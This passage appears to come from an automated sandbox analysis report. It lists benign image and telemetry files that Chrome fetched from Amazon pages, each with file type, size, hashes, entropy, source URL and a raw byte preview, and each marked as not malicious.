                                                                                                                                                                                                        SHA-512:8C96FCB726C964D700435AD75263B654E0A09B889544501DDBF008C8126A229C4892175BEB30C5240A88F413E23AA790CEA6CF03E83B5CDC9187895AA9FC51C9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................,.......r.U....f...^.|.............g/.-..w.........>7......u.~..:..f...:....e..-.............H...v$V5I5.q*.nd......u.....A..3X...Q.[..ej.....E.1.....v.......G...d..=pW.....tz.E.H.^..d:.......e....P.t..f]..]..Xw......h....^6.6.+.x.....W.w9..zK....+s.U.vn*..\..*..b..+...._.......52w1.;..y..../.5.........n.....kJ..m....1.........3`...yWk......a.>...|.z?-..&..|7O4..K.Q*.%V+........:q..;....Q^.....>.N.{.x.W..V....z.z|]....%....l.0..,.?W.t.....?.."...(.e..Mv2p]q.mu....S,4.....,..,.a.|e..w...w......Xv..w....;..S}}.TR.\c\<...m/......o_.._>....>o..9...}!.........r....d.....!.....?...-.........................!.. 1@."0.23A$Q#CP............wI..U..._Uu.y2.3w8.:..}..n.#....l.M..f8`...W.?......k..|~a?\.+.:...S
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):14535
                                                                                                                                                                                                        Entropy (8bit):7.879436571334247
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:yJTbBqd41qycOfMACm+Ndq2f5zog1yPCsVasjCCML8OwKQ+:yJTbV17cO+84eNwsjCdLo+
                                                                                                                                                                                                        MD5:CB57C5063D4D6A58113CA014E0CD4A68
                                                                                                                                                                                                        SHA1:28057B6E3C95708FE4C43D83CC0EF15473E3A8A4
                                                                                                                                                                                                        SHA-256:A81C85E7996BC6D75C2535B24B65C9E667FA538A6E426BD8B0CC5AB833F1188F
                                                                                                                                                                                                        SHA-512:ABF7A687B5C7D47C0979BFADEC367F49E63F18BCB0032B264AF1249F2916D7FEFA837AAD5E7DA6FB1DA5AA9DC699DBDB311DA5785004A809002A3A8F1D1B013A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/-NcRiM84u1IwoUa.gif
                                                                                                                                                                                                        Preview:GIF89a2.2..........]...........:....................................{............}..............u..........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.14ecb42f2c, 2023/01/13-12:25:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db" xmpMM:DocumentID="xmp.did:384E825BB64F11EDAC9EB44161D1C413" xmpMM:InstanceID="xmp.iid:384E825AB64F11EDAC9EB44161D1C413" xmp:CreatorTool="Adobe Photoshop 24.2 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b5fda8ec-2814-4cb6-8f13-b3de686f05db" stRef:documentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3063
                                                                                                                                                                                                        Entropy (8bit):7.802286401990765
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6RUmnqUeL1u4vTUOnbt/1N4PlauRLU2DKPkIdS+JKDaogAXUvafFtCzpi:TpUdpRD19oHJWQZaRavtApi
                                                                                                                                                                                                        MD5:02E9CBC339C037FE92496F50A8CF222B
                                                                                                                                                                                                        SHA1:A48FEFDE48EB6A796516D3A6A3EFFB9F8472B091
                                                                                                                                                                                                        SHA-256:BFF13D9E9AA8123C516F4625D7788D1894FA3B5CC9D41E95872A3E5E39F57E4B
                                                                                                                                                                                                        SHA-512:5B9AE48FF56A46EAC8D5C5E8DF7EE5EBBB5869CB3BAB6492BEEBF54779CC7820D997FF33EE4127E247D8823FB5BBEB7B315A17F66826ECE1C5ABB8C096F35714
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1..A."Qaq..2..#D...CR.................................................!...1A.."2.............?..Q..DD..=......z.h<_.....b.C5...*......Q.e...<.....DD....D@...DD....D@...DD....D@).;..2.+.....lj..O9|S...?Es.U.N..n.;.I.ll...{.'.....&....o.xO..1.>}{.syW/K.-.[..;.m.J..F..4.'h.V.j%....*.C+...a. ..1.....g.aW.f9..d;Qr?k|....*C,.k.>k.............V.\W"r.6.e.zJi4....1.=B..........O.9....m...=..wo.c$.;.G.....{+...c.C...Td2.:>..x.....b=.)..yE.....ven...O`....D@...DD....D@...DD....V.)z.]GvV...R.......U.Q.`1M..)..;..k...L...G2.......{.....x:k.....h]..:.AwU.g:t<E.K+.[.Y..)[..e......`..m.{.u...._..[.I;._...f.9Z.[Xv..8(..F:..!....&RVp...cjU>......?...#.gG#...U=...m.O.C.e..-.i.}...T.....PO......&|....r.]'........ ......^....O.w...N...S..h...D@.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3Asi%26si%3D2076%26pc%3D8133%26at%3D8133%26t%3D1723729140343%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8132
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):58473
                                                                                                                                                                                                        Entropy (8bit):7.990697562617293
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:XMLx7O/6Kt5aKCApKdY5XqQqGhGhgElVSijmqgoEZ9jRh:8l7/fKdpj6ndh9XBgoEjlh
                                                                                                                                                                                                        MD5:6F63CECF6A3E453ED43AE2746470D0BC
                                                                                                                                                                                                        SHA1:61D93AB591BA679FE0E30F0F644F1AAB82388619
                                                                                                                                                                                                        SHA-256:C16E36E015A8FC30B323E0CA9B58446977D94F601B6C57F29BD150DB9117B095
                                                                                                                                                                                                        SHA-512:01E2F9C0620B1B488CCD970208315A4D07A6CD42881D908CE62DE9F87C85B11BC44C430343B88471F5DD2B770A3171C2FE5DC45F394E34DEA21211D56F05D00E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U.....Q...........R.....T..S........V..P..O.............M.....N........................L.........".=.............................%1@#/>.....'3B..........V........Y....................$0?.....#3. 0..(.....L +;.....)......)8.......$..........................................!*5D.&6...............P.....Q............J..............;FS..-..........0:I[dpMUy.....go{...gp.......ck.oy......U^...l..x......y......eT\k........GOo..........\ox...WZc.....r.................z.....................................?Fg.........z......py.6>P..b.............7=]..........LUc........W-4S..,.....<........X....>FO^..a..S..M...$+I...............?FXBJ[..w........2.......R.............. .....J..2..Y..r... .IDATx..[A..H.lv..V......./.l`.......u..._.......E...,0.,.[MR...pdFDf.}...o......._;.}..............3.W.o_8>.>....|..|z....9................O}.v{.X.iZ.G.Y.5.}/g.._q.G.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 109x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5681
                                                                                                                                                                                                        Entropy (8bit):7.933002103935282
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TmCU+wKbQxxoGh+lQL9b+Bdk6kOY1GRc5RnSjxJlbfkt47WqNfUSJLMdFe:SwQ0GH9l+45VSHtfk47WUpJLke
                                                                                                                                                                                                        MD5:DE859558D3C677B9B3DFF58E9E810CB3
                                                                                                                                                                                                        SHA1:09D808C345DEAFF1C5FE3B7E99A593F677AFD6B8
                                                                                                                                                                                                        SHA-256:C47459B4767AB582013E1F55403A03F42D05B9D4FFF08EB6728A72D8D6AFDD27
                                                                                                                                                                                                        SHA-512:5326C2ED66AEC88112A42851F31C77DD9BA982C11DBAAA440DEB8BF5BAEE4516A0AA3EE10186BB11BB7B5B4AC021953A410F777CE59967B9A868F859BAA40218
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51dMriM2HlL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........m.."................................................................!1...AQa."q2BR.......#3Cbr..$st...6c................................................!.1R..2a............?..tQE.E.P...I#.U.....s$....|S....?..P3.......#.."B..$-S.oZ.i.5=.D.u'H..&Zo.*...kq..]........u.T$/..9..i..c..0.^)g....F...=>..L.{...g.*:j.P..$.b;. .K...P.y.uJ....%.+......P.< ...g.8..d2....#)H<M...e.g...Kxa..s5.l%.z.FK.....>n|.~....=...h..w....d......u4H..M..I.>.=.Y.v..%..Z...i...n.O.\.}Q..K.0.Wc.~.E...Q@QE...T}..kz?...4.k.|.H..b~...%.f.......i.X'8..r_.-....%..%@SI....T.r<.{...GO~...?..s..|[..r..$...T.....[k..^.x...M.[t.m..........K.......#..."BLed.B.-.H....+(nj.....nV..`H........$.vc..c..l..i..d..V%..Q...F.duF.e./.B.*..B...ob..H...(X...>m.T..`tE.0..u8.Fr..0b..J.&W.A...?.z.\.A{..../`X.k!.L=..x5A..-..v.4.uX.s8..I..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12778
                                                                                                                                                                                                        Entropy (8bit):7.891879750786238
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:khkCyJ6soic4mAzU4OZwLoBMIa9h1qrN8Du1an00LYw179jxEfd9kp:kWJsR4rLS21qh8DLtLYw17sl9kp
                                                                                                                                                                                                        MD5:557A8E87039A78796A75C4D92F05B26A
                                                                                                                                                                                                        SHA1:C64D8AD8C15720E3A26EF7547D17E104EA15C4F5
                                                                                                                                                                                                        SHA-256:DA692F5D575E642529BF9C8B5600FD6F5D8B0C4F8610E04E2625E59E33E4B680
                                                                                                                                                                                                        SHA-512:9B6DAF97C03E63AB2C4F2A2CAF110997483A83E743CBD2702AD0EF99C9214222CFD0B84BEE2694F384C9DC5C9565499773760E5FAE28A4F9E31362952CA18A74
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/41MgROdin7L._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................,..............-..../.^.."j.....................|.-.\W=...^....L....zyp....t......................q=.>i{.6.$&..nm......................?.h..&...-......................4..x......4..Z:...................~......}..c'...5..K...*=6.O....MN.]\.u...f.z..V..<.6c.s..................mu....VkP+Q15.B..J...T.*..+....LL.#Y.. ...........y.:..zV.C.....Q...1.2c2.+(cNL...Q...re..Jq...................y<.EKm'.a.8.f. .93.c6pd.a.....&t...`...0y.....L.s..............L|.F...&T.e.J.$. c...i..&.7...%..-..k....g..... .........../MD..U~.w.D....1".Eh.1$.A3L.0*R._G...P/..............sW.........&s.L..C6.}Fs.L....&s.g0.k..nz^...z............&...=.M.V.-.U....X.j.T..P..R.Jd..<..<g..J:..............Q...Jg5.)..l.p.1.9..l...I..a3..Y...0.:.....=.7.........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):44079
                                                                                                                                                                                                        Entropy (8bit):7.988511593282199
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:khF3yBiXOS4bwh2ab8WPaMcDBJeLQD4bFtAHnNkzRKDDkYMz:kb3jPD2ab8obcDBILQD4zIn2M3q
                                                                                                                                                                                                        MD5:DCE71910C3BF8BA185ADFF839C67AFA6
                                                                                                                                                                                                        SHA1:10FA9B9A9BB6E3FFA70B7BE777904F7C652D1DF2
                                                                                                                                                                                                        SHA-256:8BCE0D94B33706766B7FD05DA9D61270AC353B4E830AEABD512DC6ACC91A09D1
                                                                                                                                                                                                        SHA-512:4F52E0F1EA325D8E01C6A9BDB8D1FC9A1D4CCD52F498185DB7D5FE5B90B0066754E2EFD69F644872AF6BFC8D12FB2720B6D4BE4E3A010C9333F69B678C98DCD3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_08_printers_en._CB568181090_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U........M........S.....T.....N.....V..OKPT...RSU...235TUW...*+-.....LLQTMRUJOSUVX..R..P.....Q/04STV,-/MRVgko./3...mrvotx-.0...PRT......rw{!.=015...459FHJ346kptuy}KPSinr...VWYINQx|.IJMGLO..Vz..dhlqvz(4C...XY\OTV......bfjDFH#/>..Q013v{.()+TY\RW[>CF...347$0?X]`Z_clqu.........<AD..M.... "EKNjoshmqQVX.. 78;NPS.'7%&(ABD^cgCDE"#%......%1@...QRV`dh...:?B..Zejn.*:.$4..X>?ATWZLMP..)PQRJLPUZ^..W;;=`ad...JLM..T...Z\_]ad]^a.. LNR058...@EH..&......NOQ......}............ 17<?...deh.........gij..-..$...:ES.........STX......hpz[co0;I..WSTS.....UUXU.....:..U.....iCN\......Q[j..c.......l.......b........7..l......\K?..G..b..^.......k.._..4...SD\stw.....@..$......v~.ejLCQv}.`..josYWYC..R..X...w~Low.urj...Y.....b..D.....Brm{.(...<K1U=2%>z..9.cdU+..Wk.${...}>)G&(4L......n...2... .IDATx..[=n.L.u7A.M@A...H..x.9.....{.e....7.`...D..yU.$=.4.b..c[.,....^.WU..'.?........>w.}{.........n.{........>.o..y?]...7?W?.......l'.........>N.R...)...9.|dy,..}......\9.;.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 169x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10427
                                                                                                                                                                                                        Entropy (8bit):7.962248716829095
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:3ITcYnu+XzI2xIZr7PdVsYanDK5Ygz7QM6BjxoYysk4aIFaErepSt4ziUxn:3Ixu+XzXx+dV/anD0QMSFoYys3afErQ7
                                                                                                                                                                                                        MD5:D009DD402EA4CB2EFFFFCD816B0EB8A0
                                                                                                                                                                                                        SHA1:038C58EDA65E6D88931B87BE9A0F67FDDA64E32D
                                                                                                                                                                                                        SHA-256:17F82AF309321290CE8DBB5A26D874C4929AE4E3E71396A96FFE57798BB15A55
                                                                                                                                                                                                        SHA-512:138C5F8FB713D26BB38794534036095805C96BD436511CAC41DB06F678EBAED5F51D754B599D482067A21E3599767E9894633D94C66311C71528021AF3B6A4F1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.AQa"q....2BR....#3Cbr....4st...5Sd..%c....$U.....................................................!1..aq"2A..$3...BQr.............?..x.....].,.............(..^...U.U.9s.....K.....b.En..V>;.0...4n..$..C..f..0..7Bl...I.....b=v_..]...W...'.....k".....c.79....L...1.JM....0..........].#..>..p..z.......!..=.......M$H.zI.......uZ=...O.8...?.1...I.~V.......V.x....9.yg...{......._..@..k].[...7....;.\.w..V.....?58....C.....].w.j...........J.].J..[p./..O....g>.WQ.=-$j .......pz.vqni.z[.....eN.......b..*..'..kt,...Z.....=z......_.......n..E.<l4.[...._o?,ln.........S..-g.~OOHB...2...{I.>.....&.....q.38..O......xh_..E...~.4hQH..nK.7..o.7.;......N<...-.k.Z..r..+..\...[..,r.M/s....w........g...5...............B.]L.*;..jo%..Z.C1Rl...N.U<.yZ...N98
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3517
                                                                                                                                                                                                        Entropy (8bit):7.805470705852963
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:JNdjn+XvKwlFWtBrxTFKLsuA/DShlI7IXLK94sZ:JNpnEjWtBNTYLsx/DShlRbK94Q
                                                                                                                                                                                                        MD5:F5256DBAC361D6E6CC711508E65CEA18
                                                                                                                                                                                                        SHA1:79FE228703159B9996647C71DFF41E9E55BC9C72
                                                                                                                                                                                                        SHA-256:7556377C7C03D50C4D64EF52F44AA62FBCDF0B660404E457FD352B16D14672B5
                                                                                                                                                                                                        SHA-512:ADFFCAE7D59A60D7778F7AD87E9AF74F6E6AFE502D80A639FD2E53C966505271DB9C1BD817AB76F4AF99F4363A517482342A06AAD3F13D95BA358C6DB40A391F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610033_186x116_1X_en_AE._SY116_CB582137121_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........7....................................................................H................l\..7Y...E....c....-.?.....2:....2o.2.u....Q.{.#%.Re..]......IM...RFb..h........hxq........g.........N.k:N.#..i.9...D.._.ea..T..._....].7I%..D..W5"..i...*..+._.y..h.....^..r.B..ZR...6.k;.i..._.].i.?.5.P...slPz....LX...A.s.....}...q..c^..J_*..^G~...r..e;.o.(e=.c.v..w.r...iH.}...|..`>.....:O...!..d..4..................I.........................#3.CS....$c.....%04DTs....5Uet7P.........'............?..k>..:...n.):8...S8B".......8..z.g,q.M..VH.....+_..-GVX........gI=c.$q.$........:..m....vr.Q..%J!R.J..q..]..%.b.t.....Q.(...Vd.........r.....3D8..n.fR.iT..)...)..k`.%......n"......7..15....A.....rq...R.{.....|..^...._.3w.X....U.2..N.E-...@f.O.)..]...d..S.b...~.Sj(W#tH.i.!J....)K.E..yKA+2...T.P.W.J_k
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/rd/uedata?ld&v=0.295223.0&id=646E5TEYAMSGQRNCHWPV&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=646E5TEYAMSGQRNCHWPV&ue=3&bb=1115&ns=1199&ne=1297&af=1300&be=6775&fp=1297&fcp=1297&pc=11396&tc=-1475&na_=-1475&ul_=-1723729094514&_ul=-1723729094514&rd_=-1723729094514&_rd=-1723729094514&fe_=-1471&lk_=-1450&_lk=-1450&co_=-1450&_co=-813&sc_=-1450&rq_=-813&rs_=-25&_rs=1008&dl_=-17&di_=6838&de_=6838&_de=6849&_dc=11395&ld_=11395&_ld=-1723729094514&ntd=-1&ty=0&rc=0&hob=2&hoe=3&ld=11398&t=1723729105912&ctb=1&rt=_af:7-2-3-1-2-4-0_ld:57-10-5-35-5-6-0&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-09|aui:css:cache|aui:js:cache|aui:sw:page_proxy:no_ctrl|mutObsYes|mutObsActive|ewc:unpersist|ewc:unpersist:emptycart|ewc:bview|ewc|ewc:unrec|ewc:cartsize:0|ewc:aui|navbar|FWCIMEnabled|fls-eu-amazon-ae|perfYes|fy_cdn_fr|ak_cdn_mp|adblk_no|csm-feature-touch-enabled:false&viz=visible:3&pty=Landing&spty=BrowsePage&pti=30082653031&tid=1GXSAVZ7MBDVTNT0VYNB&aftb=1&ui=2&lob=1
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D3451%26pc%3D15079%26at%3D15079%26t%3D1723729109593%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15079
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 16 x 16
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1639
                                                                                                                                                                                                        Entropy (8bit):7.006723249485537
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:aqd6hCTOfaVoAp3p2vxQ1Wwb2h46lgxmR4OV9dFA+9MMy0:Jzo83pwujb2h4nmR4OVXFr9Nl
                                                                                                                                                                                                        MD5:5552D8845A31BAFBD8854A657E10E434
                                                                                                                                                                                                        SHA1:24EE24D1E07F067B0A2AE4F6D24238E614BF0B5B
                                                                                                                                                                                                        SHA-256:98CF6F0429217D92558C4BA49E03C0673ABF69AAACD25AC472A378048B317E05
                                                                                                                                                                                                        SHA-512:B227E1FECF9051CE7BF19754201504D91FEFE9AE7EB75279EDFEA90A1C2EC6FCB4E96CE258EAA82070DC4FD306E323A2D2C8B324CD231574DC8C0CFB6094958B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.................................................0...................!.......S.....h..j.....C..........s....8.....O....\............k...........,..........I..X..&........`....4.....d....b..}......?..y..........o............K............{..E........=..w....*............Q.......f..V..T....2..^..;..:....$.....m..M..G..A........6........u..(..Z..q..............!..NETSCAPE2.0.....!.......,...................-o....q40%.....N2mn3K..G....Ol!......a2Y.../..c.+..M/.p$....1.OX.... ."U>..I...O.. ....Jd...3>..+?A,.G..V.H.b@."BL!.H..WF@`...`.....!.......,...............ah=.eR...Hdg28.:4i,..6jQ+....0:..c......NO-....Q......c7......;..........5.kJ...M./.Tb.K......Lk...K1S....,f.<...9....kP3I.G....!.....+.,...............NY`O......".OUX$.&'.V.(_....T[...W^.H.._...)JZ..J\R.Y ...]&.QG...%.!L..P...S*.......Z.......P.....G.K...M.#.I..MK..... .....!.......,............../#!J.@'.....".?(e&....-Q'...IRU6H..,.V..Zi7..f#..Q.a.....+[h'Z....lgC'...mr>H5...\..# ..0-.SVW.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):33268
                                                                                                                                                                                                        Entropy (8bit):7.74699063138377
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:4YyvCAlYCdmwKNDe2/DaBDbdKzTCnbUVF9X7G5Vyc:4UC0wKR0BDbETCnIF3c
                                                                                                                                                                                                        MD5:44C5ACA9865E4D7DAD0F9AD4082EA612
                                                                                                                                                                                                        SHA1:14A6302B362BB33CCA565548E5F3017B090202CF
                                                                                                                                                                                                        SHA-256:7D182376483481C1C0EF3A2235B10CCF49DCF2C58B5AA51EA7BB8677916B72E0
                                                                                                                                                                                                        SHA-512:F16A8C815319CC9491C23C6D18CED92A2295A5F276E570EAD35B7A4AB991DE5016AB510BF291EF36951B09D2D820F5AE27AA9DB980E64175F87047B77A845710
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51jO6YMJDUL._SX1500_.jpg
